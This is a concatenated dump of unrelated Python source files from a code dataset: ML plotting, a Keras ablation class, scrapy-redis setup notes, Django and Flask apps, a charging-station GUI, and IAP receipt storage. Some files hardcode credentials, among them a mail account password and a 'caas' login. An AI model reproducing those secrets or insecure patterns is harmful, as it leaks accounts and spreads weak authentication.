60))\n\nD00_TPR_array.append(1)\nD00_FPR_array.append(1)\nD01_TPR_array.append(1)\nD01_FPR_array.append(1)\nD10_TPR_array.append(1)\nD10_FPR_array.append(1)\nD11_TPR_array.append(1)\nD11_FPR_array.append(1)\nD20_TPR_array.append(1)\nD20_FPR_array.append(1)\nD40_TPR_array.append(1)\nD40_FPR_array.append(1)\nD43_TPR_array.append(1)\nD43_FPR_array.append(1)\nD44_TPR_array.append(1)\nD44_FPR_array.append(1)\n\nD00_TPR_array.sort()\nD00_FPR_array.sort()\nD01_TPR_array.sort()\nD01_FPR_array.sort()\nD10_TPR_array.sort()\nD10_FPR_array.sort()\nD11_TPR_array.sort()\nD11_FPR_array.sort()\nD20_TPR_array.sort()\nD20_FPR_array.sort()\nD40_TPR_array.sort()\nD40_FPR_array.sort()\nD43_TPR_array.sort()\nD43_FPR_array.sort()\nD44_TPR_array.sort()\nD44_FPR_array.sort()\n\n# Title\nplt.title('ROC Plot for DenseNet161')\n# Axis labels\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.plot(D00_FPR_array, D00_TPR_array, color='blue', linewidth=3, label='D00')\nplt.plot(D01_FPR_array, D01_TPR_array, color='green', linewidth=3, label='D01')\nplt.plot(D10_FPR_array, D10_TPR_array, color='orange', linewidth=3, label='D10')\nplt.plot(D11_FPR_array, D11_TPR_array, color='black', linewidth=3, label='D11')\nplt.plot(D20_FPR_array, D20_TPR_array, color='cyan', linewidth=3, label='D20')\nplt.plot(D40_FPR_array, D40_TPR_array, color='lavender', linewidth=3, label='D40')\nplt.plot(D43_FPR_array, D43_TPR_array, color='lime', linewidth=3, label='D43')\nplt.plot(D44_FPR_array, D44_TPR_array, color='coral', linewidth=3, label='D44')\nplt.legend()\nplt.show()\n\n# Title\nplt.title('Epoch Vs Accuracy for DenseNet161')\n# Axis labels\nplt.xlabel('Epoch')\nplt.ylabel('Accuracy')\nplt.plot(epoch_array, accu_array)\nplt.show()","sub_path":"Image_Classification/DenseNet161_Model.py","file_name":"DenseNet161_Model.py","file_ext":"py","file_size_in_byte":10260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"33291547","text":"import numpy as np\nimport dask.array as da\n\ndef pad_arrays(arrays, constant_values, stack=True):\n \"\"\"\n Pad arrays with variable axis sizes. A bounding box is calculated across all the arrays and each sub-array is\n padded to fit within the bounding box. This is a light wrapper around dask.array.pad. If `stack` is True,\n the arrays will be combined into a larger array via da.stack.\n\n Parameters\n ----------\n arrays : An iterable collection of dask arrays\n constant_values : The value to fill when padding images\n\n constant_values : A number which specifies the fill value / mode to use when padding.\n\n stack: boolean that determines whether the result is a single dask array (stack=True) or a list of dask arrays (stack=False).\n\n Returns padded arrays and a list of paddings.\n -------\n\n \"\"\"\n\n shapes = np.array([a.shape for a in arrays])\n bounds = shapes.max(0)\n pad_extent = [\n list(zip([0] * shapes.shape[1], (bounds - np.array(a.shape)).tolist()))\n for a in arrays\n ]\n\n # pad elements of the first axis differently\n def padfun(array, pad_width, constant_values):\n return np.stack([np.pad(a, pad_width, constant_values=cv) for a, cv in zip(array, constant_values)])\n # If all the shapes are identical no padding is needed.\n if np.unique(shapes, axis=0).shape[0] == 1:\n padded = arrays\n else:\n padded = [\n a.map_blocks(padfun,\n pad_width=pad_extent[ind][1:],\n constant_values=constant_values,\n chunks=tuple(c + p[1] - p[0] for c, p in zip(a.chunksize, pad_extent[ind])),\n dtype=a.dtype)\n for ind, a in enumerate(arrays)]\n\n return padded, pad_extent\n\n\ndef arrays_from_delayed(args, shapes=None, dtypes=None):\n \"\"\"\n\n Parameters\n ----------\n args: a collection of dask.delayed objects representing lazy-loaded arrays.\n\n shapes: a collection of tuples specifying the shape of each array in args, or None. if None, the first array will be loaded\n using local computation, and the shape of that arrays will be used for all subsequent arrays.\n\n dtypes: a collection of strings specifying the datatype of each array in args, or None. If None, the first array will be loaded\n using local computation and the dtype of that array will be used for all subsequent arrays.\n\n Returns a list of dask arrays.\n -------\n\n \"\"\"\n\n if shapes is None or dtypes is None:\n sample = args[0].compute(scheduler=\"threads\")\n if shapes is None:\n shapes = (sample.shape,) * len(args)\n if dtypes is None:\n dtypes = (sample.dtype,) * len(args)\n\n assert len(shapes) == len(args) and len(dtypes) == len(args)\n\n arrays = [\n da.from_delayed(args[ind], shape=shapes[ind], dtype=dtypes[ind])\n for ind in range(len(args))\n ]\n return arrays\n\n\n","sub_path":"fst/io/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"635787034","text":"import keras\nimport numpy as np\nimport tensorflow as tf\nfrom glob import glob\nimport pandas as pd\nfrom tqdm import tqdm\nimport keras.backend as K\nfrom keras.utils import np_utils\nfrom keras.models import load_model\n\nclass Ablation():\n\t\"\"\"\n\n\tA class for conducting an ablation study on a trained keras model instance\n\t\n\t\"\"\"\n\n\tdef __init__(self, model, weights_pth, metric, layer_name, test_image, gt, classes, nclasses=4):\n\t\t\n\t\t\"\"\"\n\t\tmodel : keras model architecture (keras.models.Model)\n\t\tweights_pth : saved weights path (str)\n metric : metric to compare prediction with gt, for example dice, CE\n layer_name : name of the layer which needs to be ablated\n test_img : test image used for ablation\n gt : ground truth for comparision\n classes : class informatiton which needs to be considered, class label as \n\t\t\t\tkey and corresponding required values \n\t\t\t\tin a tuple: {'class1': (1,), 'whole': (1,2,3)}\n nclasses : number of unique classes in gt\n\t\t\"\"\"\t\t\n\n\t\tself.model = model\n\t\tself.weights = weights_pth\n\t\tself.metric = metric\n\t\tself.test_image = test_image\n\t\tself.layer = layer_name\n\t\tself.gt = gt\n\t\tself.classinfo = classes\n\t\tself.nclasses = nclasses\n\n\n\n\tdef ablate_filter(self, step=1):\n\t\t\"\"\"\n\t\tDrops individual weights from the model, makes the prediction for the test image,\n\t\tand calculates the difference in the evaluation metric as compared to the non-\n\t\tablated case. For example, for a layer with a weight matrix of shape 3x3x64, \n\t\tindividual 3x3 matrices are zeroed out at the interval given by the step argument.\n\t\t\n\t\tArguments:\n\t\tstep: The interval at which to drop weights\n\n\t\tOutputs: A dataframe containing the importance scores for each individual weight matrix in the layer\n\t\t\"\"\"\n\n\t\tlayer_idx = 0\n\t\tfor idx, layer in enumerate(self.model.layers):\n\t\t\tif layer.name == self.layer:\n\t\t\t\tfilters_to_ablate = np.arange(0, layer.get_weights()[0].shape[-1], step)\n\t\t\t\tlayer_idx = idx\n\t\t \n\t\t#print('Layer = %s' %self.model.layers[self.layer].name)\n\t\tself.model.load_weights(self.weights, by_name = True)\n\n\t\t#predicts each volume and save the results in np array\n\t\tprediction_unshaped = self.model.predict(self.test_image, batch_size=1, verbose=0)\n\n\t\tdice_json = {}\n\t\tdice_json['feature'] = []\n\t\tfor class_ in self.classinfo.keys():\n\t\t\tdice_json[class_] = []\n\n\t\tfor j in tqdm(filters_to_ablate):\n\t\t\t#print('Perturbed_Filter = %d' %j)\n\t\t\tself.model.load_weights(self.weights, by_name = True)\n\t\t\tlayer_weights = np.array(self.model.layers[layer_idx].get_weights())\n\n\t\t\toccluded_weights = layer_weights.copy()\n\t\t\toccluded_weights[0][:,:,:,j] = 0\n\t\t\toccluded_weights[1][j] = 0\n\n\t\t\tself.model.layers[layer_idx].set_weights(occluded_weights)\t\t\t\n\t\t\tprediction_unshaped_occluded = self.model.predict(self.test_image,batch_size=1, verbose=0) \n\n\t\t\tdice_json['feature'].append(j)\n\t\t\tfor class_ in self.classinfo.keys():\n\t\t\t\tdice_json[class_].append(self.metric(self.gt, prediction_unshaped.argmax(axis = -1), self.classinfo[class_]) - \\\n\t\t\t\t\t \t\tself.metric(self.gt, prediction_unshaped_occluded.argmax(axis = -1), self.classinfo[class_]))\n\n\n\t\tdf = pd.DataFrame(dice_json)\n\t\treturn df\n\n","sub_path":"BioExp/spatial/ablation.py","file_name":"ablation.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"373411515","text":"\"\"\"\n\n源码地址: https://github.com/rmax/scrapy-redis\n\n本笔记包含:\n1.Scrapy-redis配置\n2.Scrapy-redis分布式组件\n3.改造为分布式爬虫\n4.持久化存储\n\n\n\"\"\"\n\n\n###################\n# 1.Scrapy-redis配置\n###################\n\n\"\"\"\n\nwindows下, 进行Redis安装步骤\n\n1.下载程序并解压\n2.修改配置文件, 如果链接服务器为本地, 注释掉\n3.配置环境变量, 管理员方式启动cmd并输入 redis-server即可开启\n\nLinux下\n\n1. sudo vi /etc/redis/redis.conf 注释本地连接, 允许远程链接\n2. sudo redis-server /etc/redis/redis.conf 启动\n\n链接:\n\n主机端: redis-cli\n非主机端: redis-cli -h master_ip\n\n链接后开启分布式爬虫:\n运行分布式爬虫文件 scrapy runspider ****.py\n将起始的url和key扔进队列中:\n\nlpush key(文件中设置) 起始���url\n\n\"\"\"\n\n\n########################\n# 2.Scrapy-redis分布式组件\n########################\n\n\"\"\"\n\n由多台机器来完成一个任务, 从而缩短任务的执行时间\n\n优点在于: 提升速度, 单个节点不稳定不会影响整个任务的执行\n\n分布式组件结合了redis数据库和scrapy框架, 弥补了scrapy框架不能做分布式的缺点\n\nscrapy和scrapy-redis组件区别\n\n scrapy scrapy-redis\nscheduler(调度器): 请求在调度器中执行 将数据放到redis数据库队列中处理\nDuplication Filter\n(重复过滤器): 请求指纹,用python集合 在redis数据库的set中去重\nitempipeline: 决定数据如何处理的中间件 将数据存放到redis数据库队列中\nSpider: 普通的scrapy爬虫类 可以从redis中获取url\n\n\"\"\"\n\n#################\n# 3.改造为分布式爬虫\n#################\n\n\"\"\"\n\n步骤:\n1.导入分布式爬虫类\nfrom scrapy_redis.spiders import RedisSpider\n\n2.修改爬虫的继承\nclass XXXX(RedisSpider)\n\n3.注销allowed_domains和start_urls\n\n4.动态获取允许的域\ndef __init__(self, *args, **kwargs):\n domain = kwargs.pop('domain', '')\n self.allowed_domains = list(filter(None, domain.split(',')))\n super(XXXX, self).__init__(*args, **kwargs)\n\n5.添加redis_key\nredis_key = '随意写值'\n\n6.修改配置文件\n\n(1)# 指定调度器中的重复过滤器使用scrapy_redis的重复过滤器\nDUPEFILTER_CLASS = \"scrapy_redis.dupefilter.RFPDupeFilter\"\n(2)# 指定调度器为scapy_redis中的调度器\nSCHEDULER = \"scrapy_redis.scheduler.Scheduler\"\n(3)# 调度器是否保持任务队列, 开启支持断点续传\nSCHEDULER_PERSIST = True\n\n# SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderPriorityQueue\" # 优先队列, 默认\n# SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderQueue\" # 普通队列\n# SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderStack\" # 栈\n\n(4)ITEM_PIPELINES = {\n # 'XXXX.pipelines.ExamplePipeline': 300,\n # 负责将数据传输到redis数据库中数据队列\n 'scrapy_redis.pipelines.RedisPipeline': 400,\n}\n(5)# 链接数据库\nREDIS_URL = \"redis://172.16.123.128:6379\"\n\n\n\"\"\"\n\n############\n# 4.持久化储存\n############\n\n\"\"\"\n\n将redis中存储的item数据存储到其他数据库中\n\n原因: redis内存数据库, 容量有限, 并且容易丢失数据, 一般存储数据都用MongoDB或者SQL\n\n存入MongoDB中的demo:\n\n\"\"\"\n\nimport redis\nfrom pymongo import MongoClient\nimport json\n\n# 链接redis数据库\nredis_cli = redis.Redis(host='主机ip', port=6379, db=0)\n# 链接mongo\nmongo_cli = MongoClient('127.0.0.1', 27017)\ndb = mongo_cli['xxx']\ncol = db['xx']\n\nwhile 1:\n # 从redis中读取数据\n source, data = redis_cli.blpop(['xxx:items']) # 返回一个元组, 前者为键, 后者为数据\n # 我们想要的数据存在data中, 转成字典存入mongodb\n dict_data = json.loads(data)\n col.insert(dict_data)","sub_path":"python库/Scrapy/Scrapy-redis分布式.py","file_name":"Scrapy-redis分布式.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"447584231","text":"# Linked List, Two Pointers\n\n# Given a singly linked list, determine if it is a palindrome.\n#\n# Example 1:\n#\n# Input: 1->2\n# Output: false\n# Example 2:\n#\n# Input: 1->2->2->1\n# Output: true\n# Follow up:\n# Could you do it in O(n) time and O(1) space?\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n if head is None or head.next is None:\n return True\n slow, fast = head, head\n # get the middle element\n while fast != None and fast.next != None:\n slow = slow.next\n fast = fast.next.next\n\n # reverse the first half of the linked list\n p1 = None\n p2 = head\n while p2 != slow:\n p3 = p2.next\n p2.next = p1\n p1 = p2\n p2 = p3\n\n # odd number case\n if fast != None:\n slow = slow.next\n\n # check first half and second half\n while p1 != None and slow != None:\n if p1.val != slow.val:\n return False\n p1 = p1.next\n slow = slow.next\n return True\n","sub_path":"LeetCode/234 Palindrome Linked List.py","file_name":"234 Palindrome Linked List.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"500303695","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import *\nfrom .models import *\n\n# Create your views here.\ndef homm(request,id):\n\n biz = Business.objects.all()\n\n post = Post.objects.filter(hood_id=id)\n\n activ = Activities.objects.all()\n\n post = Post.objects.filter(hood_id=id)\n return render(request, 'home.html', locals())\n\ndef register(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('login')\n else:\n form = UserCreationForm()\n\n return render(request,'signup.html',locals())\n\ndef search_business(request):\n \n if 'business' in request.GET and request.GET[\"business\"]:\n search_term = request.GET.get(\"business\")\n searched_business = Business.search_by_name(search_term)\n message = f\"{search_term}\"\n\n return render(request, 'search.html',locals())\n\n else:\n message = \"You haven't searched for any term\"\n return render(request, 'search.html',locals())\n\n\ndef hood(request):\n if request.method == 'POST':\n form = NeighbourHoodForm(request.POST,request.FILES)\n\n if form.is_valid():\n form.save()\n return redirect('location')\n else:\n form = NeighbourHoodForm()\n return render(request,'hood.html',locals())\n\ndef location(request):\n post = Post.objects.all()\n hood = NeighbourHood.objects.all()\n return render(request,'location.html')\n\n@login_required\ndef post(request):\n if request.method == 'POST':\n form = MakePostForm(request.POST,request.FILES)\n\n if form.is_valid():\n post=form.save(commit=False)\n post.save()\n return redirect('home',1)\n else:\n form = MakePostForm()\n return render(request,'post.html',locals())\n\n# @login_required\n# def search_business(request):\n\n# if 'business' in request.GET and request.GET[\"business\"]:\n# search_term = request.GET.get(\"business\")\n# searched_business = Business.search_by_business_name(search_term)\n# message = f\"{search_term}\"\n\n# return render(request, 'search.html',locals())\n\n# else:\n# message = \"You haven't searched for any term\"\n# return render(request, 'search.html',locals())\n\ndef profile(request):\n profile=Profile.objects.filter(user_id=request.user)\n \n return render(request, 'profile.html',{'profile':profile})\n\n\ndef update(request):\n all_profile = Profile.objects.all()\n profile = Profile.objects.get(user_id = request.user)\n if request.method == 'POST':\n form = UploadForm(request.POST,request.FILES)\n\n if form.is_valid():\n form.save()\n return redirect('profile')\n else:\n form = ProfileForm()\n\n return render(request,'new_profile.html', locals())\n\n\ndef editprofile(request):\n \n if request.method == 'POST':\n form = ProfileForm(request.POST,request.FILES)\n \n if form.is_valid():\n profile=form.save(commit=False)\n profile.user_id=request.user\n profile.save()\n return redirect('profile',request.user.id)\n else:\n form =ProfileForm()\n \n return render(request,'editprofile.html',locals())\n\n\ndef update_index(request):\n # all_profile = Profile.objects.all()\n profile = UserProfile.objects.get(user_id = request.user)\n if request.method == 'POST':\n form = UploadForm(request.POST,request.FILES)\n\n if form.is_valid():\n form.save()\n return redirect('profile')\n else:\n form = UploadForm()\n\n return render(request,'new.html', locals())\n\ndef biz(request):\n if request.method == 'POST':\n form = BizForm(request.POST,request.FILES)\n\n if form.is_valid():\n form.save()\n return redirect('home',1)\n else:\n form = BizForm()\n return render(request,'business.html',locals())\n\n\ndef activ(request):\n if request.method == 'POST':\n form = ActivForm(request.POST,request.FILES)\n\n if form.is_valid():\n form.save()\n return redirect('home',1)\n else:\n form = ActivForm()\n return render(request,'activities.html',locals())","sub_path":"hoodies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"79846476","text":"from guizero import App, Text, Combo, PushButton, info, TextBox,ButtonGroup\nfrom smbus import SMBus\nfrom time import sleep\nfrom firebase import firebase\naddr = 0x8\nbus = SMBus(1)\nids=[\"13322865231\"]\ndef tobytes(wrd):\n for c in wrd:\n bus.write_byte(addr,ord(c))\n\ndef dets(wrd):\n tobytes(wrd)\n if(wrd==\"id\"):\n x=11\n elif(wrd==\"SOC\"):\n x=5\n sleep(10)\n elif(wrd==\"START\"):\n x=8\n elif(wrd==\"STOP\"):\n x=7\n sleep(3)\n resp=\"\".join(map(chr, bus.read_i2c_block_data(addr,0,x)))\n return resp\n\ndef done():\n stopped=dets(\"STOP\")\n print(stopped)\n print(\"SOC:\"+\"{}\".format(r)+\"%\")\n info(\"Completed\", \" Charged to {}\".format(fs.value)+\"%\")\n fb_id=firebase.FirebaseApplication('https://caas-soc.firebaseio.com/')\n result=fb_id.post(\"https://caas-soc.firebaseio.com/{}\".format(id),{\"Charge Consumed:\":float(fs.value)-float(soc_init)})\n print(result)\n quit()\ndef check():\n global final\n global r\n final=fs.value\n r=float(dets(\"SOC\"))\n print(\"{}\".format(r)+\"%\")\n if(r=float(fs.value)):\n info(\"STATUS\",\"Already charged upto or more than {}\".format(fs.value)+\"%\")\n elif(r>=100):\n info(\"STATUS\", \"Charge Full\")\n done()\n\ndef get_charge(id,soc):\n global soc_final\n global charge\n global fs\n app1.hide()\n app.show()\n model = Text(app, text=\"ID:\"+id, grid=[1, 0], align=\"left\")\n charge=Text(app, text=\"State of charge: \"+\"{}\".format(float(soc))+\"%\",grid=[1,1], align=\"left\")\n final=Text(app,text=\"Desired final SOC:\",grid=[1,2],align=\"left\")\n fs=TextBox(app,grid=[2,2],align=\"left\")\n ch = PushButton(app,command=check, text=\"Charge\", grid=[1,3])\n\ndef do_check():\n if user_in.value == \"caas\":\n if pas_in.value == \"caas\":\n info(\"LOGIN\",\"Successfully logged in\")\n get_charge(id,soc_init)\nid=\"NA\"\nwhile(id not in ids):\n id=dets(\"id\")\n print(id)\nsoc_init=float(dets(\"SOC\"))\napp1 = App(title=\"Coimbatore Charging Station\")\nuser = Text (app1,text=\"Enter your Username\")\nuser_in = TextBox(app1)\npas = Text(app1,text=\"Enter your Password\")\npas_in = TextBox(app1)\nlogin = PushButton(app1,command = do_check,text=\"LOGIN\")\napp = App(title=\"Coimbatore Charging Station\", layout=\"grid\")\napp.hide()\napp1.display()\n\n\n\n\n\n","sub_path":"py_main.py","file_name":"py_main.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"369173860","text":"from flask import (Flask,render_template,\n redirect,url_for,request)\nfrom flask_mail import Mail\nfrom itsdangerous import URLSafeTimedSerializer\nfrom flask.ext.mail import Message\nfrom flask_wtf.csrf import CsrfProtect\nimport os\nimport logging\nimport forms\nimport sys\n\n\n\n\n\n##mail server \nMAIL_SERVER ='smtp.mail.yahoo.com'\nMAIL_PORT =465\nMAIL_USE_TLS = False\nMAIL_USE_SSL = True\n#\nMAIL_USERNAME = \"basuddem\"\nMAIL_PASSWORD = \"qwerasdzx01!\"\n\n\nDEFAULT_MAIL_SENDER = \"basuddem@yahoo.co.uk\"\n\n\nSECRET_KEY = \"tightly_guarded\"\n\n\nDEBUG = True\nPORT = 80\nHOST = \"127.0.0.1\"\n\n##create the app\napp = Flask(__name__)\napp.config.from_object(__name__)\n\nmail = Mail(app)\nCsrfProtect(app)\n#add a secret key since we be using sessions(for cryptographic signing of cookies)\napp.secret_key = os.urandom(24)\n##app.config['SECRET_KEY']\nts = URLSafeTimedSerializer(app.secret_key)\n\n\n\n##add the route to the registration form,\n##takes two methods post and get(able to load the view,\n##so they can see the form and\n##also post back to process the fom\n@app.route('/',methods=('GET','POST'))\ndef index():\n\n \n form = forms.Form()\n \n ##check if the form is submitted and valid\n if form.validate_on_submit():\n ##redirect user to the main page\n ##abstract form data\n name = form.name.data\n email = form.email.data\n phone_number = form.phone_number.data\n budget = form.budget.data\n choice = form.myField.data\n post = form.post.data\n \n subject = \"client information\"\n html = render_template(\n 'information.html',name = name, email= email ,phone_number = phone_number,\n budget = budget , choice = choice , post = post)\n msg = Message(\n subject= subject,\n recipients=['basuddem@yahoo.co.uk'],\n sender =DEFAULT_MAIL_SENDER,\n html=html\n )\n mail.send(msg)\n return redirect(url_for(\"index\"))\n ##if we don't redirect then\n return render_template(\"index.html\",form=form)\n\n@app.route('/index_fr',methods=('GET','POST'))\ndef index_fr():\n\n \n form = forms.Form()\n \n ##check if the form is submitted and valid\n if form.validate_on_submit():\n ##redirect user to the main page\n ##abstract form data\n name = form.name.data\n email = form.email.data\n phone_number = form.phone_number.data\n budget = form.budget.data\n choice = form.myField.data\n post = form.post.data\n \n subject = \"client information\"\n html = render_template(\n 'information.html',name = name, email= email ,phone_number = phone_number,\n budget = budget , choice = choice , post = post)\n msg = Message(\n subject= subject,\n recipients=['basuddem@yahoo.co.uk'],\n sender =DEFAULT_MAIL_SENDER,\n html=html\n )\n mail.send(msg)\n return redirect(url_for(\"index\"))\n ##if we don't redirect then\n return render_template(\"index_fr.html\",form=form)\n\n@app.route(\"/Team\",methods=('GET','POST'))\ndef team():\n form = forms.Form()\n \n ##check if the form is submitted and valid\n if form.validate_on_submit():\n ##redirect user to the main page\n subject = \"client information\"\n html = render_template(\n 'information.html')\n msg = Message(\n subject,\n recipients='basuddem@yahoo.co.uk',\n sender =DEFAULT_MAIL_SENDER,\n html=html\n )\n mail.send(msg)\n return redirect(url_for(\"team\"))\n ##if we don't redirect then\n return render_template(\"team.html\",form=form)\n \n\n\n@app.route(\"/address\",methods=('GET','POST'))\ndef address():\n form = forms.Form()\n \n ##check if the form is submitted and valid\n if form.validate_on_submit():\n ##redirect user to the main page\n subject = \"client information\"\n html = render_template(\n 'information.html')\n msg = Message(\n subject,\n recipients='basuddem@yahoo.co.uk',\n sender = DEFAULT_MAIL_SENDER,\n html=html\n )\n mail.send(msg)\n return redirect(url_for(\"address\"))\n return render_template(\"address.html\",form=form)\n\n\napp.logger.addHandler(logging.StreamHandler(sys.stdout))\napp.logger.setLevel(logging.ERROR) \n\nif __name__ == '__main__':\n ##initialize the models\n \n app.run(debug=DEBUG,host=HOST,port=PORT)\n \n \n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"446386926","text":"'''\n#模块:hashlib\n大纲:加密说明、加密算法、加密步骤\n加密说明:\n 1.该加密模块加密后的内容不可解密\n 2.用法:存储密码,用户每次输入密码后,都进行加密操作,在与数据库加密内容进行比对验证\n加密算法:\n md5 sha256\n加密步骤:\n 1.m = hashlib.md5() #获取加密算法对象\n 2.m.update(bytes类型) #加密数据\n 3.value = m.hexdigest() #获取加密后数据\n'''\nimport hashlib\nm = hashlib.md5()\n#m = hashlib.sha256()\nm.update(\"你好\".encode(\"utf8\"))\n#print(m.hexdigest())\nvalue = m.hexdigest()\nprint(value)","sub_path":"03常用模块整理/07hashlib模块.py","file_name":"07hashlib模块.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"635978674","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\n\nfrom luckycommon.utils.decorator import sql_wrapper\nfrom luckycommon.model.iap_receipt import IAPReceipt, IAPInvalidReceipt\nfrom luckycommon.model import orm\n\n@sql_wrapper\ndef get_receipt_by_transaction_id(transaction_id):\n return IAPReceipt.query.filter(IAPReceipt.id == transaction_id).first()\n\n@sql_wrapper\ndef get_invalid_receipt_by_hash_text(text):\n return IAPInvalidReceipt.query.filter(IAPInvalidReceipt.id == text).first()\n\n\n\nSTATUS_CODE_DESCRIPTION= {\n # App Store status code\n '21000': 'The App Store could not read the JSON object you provided.',\n '21002': 'The data in the receipt-data property was malformed or missing.',\n '21003': 'The receipt could not be authenticated.',\n '21004': '''The shared secret you provided does not match the shared secret on file for your account.\nOnly returned for iOS 6 style transaction receipts for auto-renewable subscriptions.''',\n '21005': 'The receipt server is not currently available.',\n '21006': '''This receipt is valid but the subscription has expired. When this status code\nis returned to your server, the receipt data is also decoded and returned as\npart of the response. Only returned for iOS 6 style transaction receipts for\nauto-renewable subscriptions.''',\n '21007': '''This receipt is from the test environment, but it was sent to the production\nenvironment for verification. Send it to the test environment instead.''',\n '21008': '''This receipt is from the production environment, but it was sent to the test\nenvironment for verification. Send it to the production environment instead.''',\n # Custom status code\n '30000': 'bundle id not match.',\n '30001': 'production id not match',\n}\n\n\n@sql_wrapper\ndef save_receipt(user_id, pay_id,receipt_data, result_info):\n iap_receipt = IAPReceipt()\n in_app = result_info['receipt']['in_app'][0]\n transaction_id = in_app['transaction_id']\n product_id = in_app['product_id']\n env = result_info.get(\"environment\", \"production\")\n iap_receipt.id = transaction_id\n iap_receipt.user_id = user_id\n iap_receipt.pay_id = pay_id\n iap_receipt.receipt = receipt_data\n iap_receipt.receipt_info = str(result_info)\n iap_receipt.product_id = product_id\n iap_receipt.environment = env\n iap_receipt.provide_status = 0\n iap_receipt.updated_at = datetime.utcnow()\n iap_receipt.save()\n\n\n@sql_wrapper\ndef save_invalid_receipt(hash_text, receipt_data, status_code):\n iap_invalid_receipt = IAPInvalidReceipt()\n iap_invalid_receipt.id = hash_text\n iap_invalid_receipt.receipt = receipt_data\n iap_invalid_receipt.status = status_code\n iap_invalid_receipt.extend = STATUS_CODE_DESCRIPTION.get(str(status_code), 'Other reasons')\n iap_invalid_receipt.updated_at = datetime.utcnow()\n iap_invalid_receipt.save()\n\n\n@sql_wrapper\ndef update_receipt_provide_success(transaction_id):\n res = IAPReceipt.query.filter(IAPReceipt.id == transaction_id).filter(IAPReceipt.provide_status == 0).update(\n {\n 'provide_status': 1,\n 'updated_at': datetime.utcnow()\n }\n )\n if res:\n orm.session.commit()\n return True\n else:\n res = IAPReceipt.query.filter(IAPReceipt.id == transaction_id).filter(IAPReceipt.provide_status == 2).update(\n {\n 'provide_status': 1,\n 'updated_at': datetime.utcnow()\n }\n )\n if res:\n orm.session.commit()\n return True\n else:\n return False\n\n\n@sql_wrapper\ndef update_receipt_provide_fail(transaction_id):\n res = IAPReceipt.query.filter(IAPReceipt.id == transaction_id).filter(IAPReceipt.provide_status == 0).update(\n {\n 'provide_status': 2,\n 'updated_at': datetime.utcnow()\n }\n )\n if res:\n orm.session.commit()\n return True\n else:\n return False\n\n\n\n\n\n\n","sub_path":"luckycommon/db/iap_receipt.py","file_name":"iap_receipt.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"200084704","text":"import sys\r\nfrom PIL.ImageQt import ImageQt\r\nfrom PIL import Image\r\nfrom PyQt5.QtGui import QPixmap\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtWidgets import QLabel, QApplication, QWidget, QScrollArea, QGridLayout\r\n\r\nfrom a3d_class import *\r\n\r\n\r\nclass Window(QScrollArea):\r\n def __init__(self, filenames):\r\n super(Window, self).__init__()\r\n self.row = 0\r\n widget = QWidget()\r\n self.layout = QGridLayout(widget)\r\n self.layout.setAlignment(Qt.AlignTop)\r\n self.populate(filenames)\r\n self.setWidget(widget)\r\n self.setWidgetResizable(True)\r\n self.show()\r\n\r\n def append_row(self, name, value):\r\n label1 = QLabel(name)\r\n self.layout.addWidget(label1, self.row, 0)\r\n if type(value) == str:\r\n label2 = QLabel(value)\r\n self.layout.addWidget(label2, self.row, 1)\r\n elif type(value) == Image.Image:\r\n label2 = QLabel(\"\")\r\n image_qt = ImageQt(value)\r\n pixmap = QPixmap.fromImage(image_qt)\r\n pixmap.detach()\r\n # https://stackoverflow.com/questions/35204123/python-pyqt-pixmap-update-crashes\r\n label2.setPixmap(pixmap)\r\n self.layout.addWidget(label2, self.row, 1)\r\n else:\r\n raise ValueError()\r\n self.row += 1\r\n\r\n def populate(self, filenames):\r\n pages = []\r\n for filename in filenames:\r\n print('loading: %s' % filename)\r\n page = ScenarioPage.open(filename)\r\n pages.append(page)\r\n\r\n print('processing...')\r\n scenario = Scenario.frompages(*pages)\r\n\r\n author = str(scenario.body.author)\r\n title = str(scenario.header.title)\r\n filename = f\"{author}_{title}.dat\"\r\n with open(filename, mode=\"wb\") as f:\r\n f.write(scenario.body)\r\n\r\n self.append_row(\"作者名\", str(scenario.body.author))\r\n self.append_row(\"シナリオ名\", str(scenario.header.title))\r\n self.append_row(\"シナリオ説明文\", str(scenario.header.description))\r\n\r\n # height map\r\n height_map_im = scenario.body.height_map.to_image()\r\n self.append_row(\"Height map\", height_map_im)\r\n\r\n # building?\r\n building_map_im = scenario.body.building_map.to_image()\r\n self.append_row(\"Building map?\", building_map_im)\r\n\r\n # layers?\r\n for i in 